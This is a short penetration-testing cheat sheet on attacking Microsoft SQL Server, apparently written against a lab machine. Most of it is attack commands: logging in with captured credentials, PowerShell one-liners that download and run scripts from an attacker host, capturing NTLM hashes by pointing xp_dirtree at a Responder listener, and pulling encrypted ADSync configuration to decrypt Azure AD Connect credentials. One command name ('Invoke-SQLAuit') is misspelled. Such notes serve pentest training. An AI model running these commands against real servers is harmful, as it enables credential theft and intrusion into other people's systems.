MSSQL

Do you have a valid creds?

mssqlclient.py manager/operator:operator@manager.htb -windows-auth

# myssqlclient.py <domain>/<user>:<pass>@<full domain> -windows-auth

Enumeration for PrivEsc

Do you have access to the machine with mssql?

sqlcmd -Q "select * from sys.databases"
sqlcmd -Q "select name,create_date from sys.databases"

Using PowerUpSQL

GitHub - NetSPI/PowerUpSQL: PowerUpSQL: A PowerShell Toolkit for Attacking SQL ServerGitHub

# download and import
PS> IEX(New-Object Net.WebClient).downloadString("http://<attacker ip>:<port>/PowerUpSQL.ps1")


Invoke-SQLAuit -Verbose

Capturing the NTLM Hash

Make sure you have access to command xp_dirtree in the sqlcmd.

# setup responder
sudo responder -I tun0

# call the attacker IP inside the sqlcmd

sqlcmd -Q "xp_dirtree '\\<attacker ip>\test'"

There is Azure AD and DCSync?

ref: https://blog.xpnsec.com/azuread-connect-for-redteam/

sqlcmd -Q "Use ADSync; select private_configurateion_xml,encrypted_configuration FROM mms_management_agent"


# download the code as decrypt.ps1 and make sure you change the Data Source.
IEX(New-Object Net.WebClient).downloadString('http://<attacker ip>:<port>/decrypt.ps1')

PreviousMSRPC (135)NextKerberos (88/tcp)

Last updated 6 months ago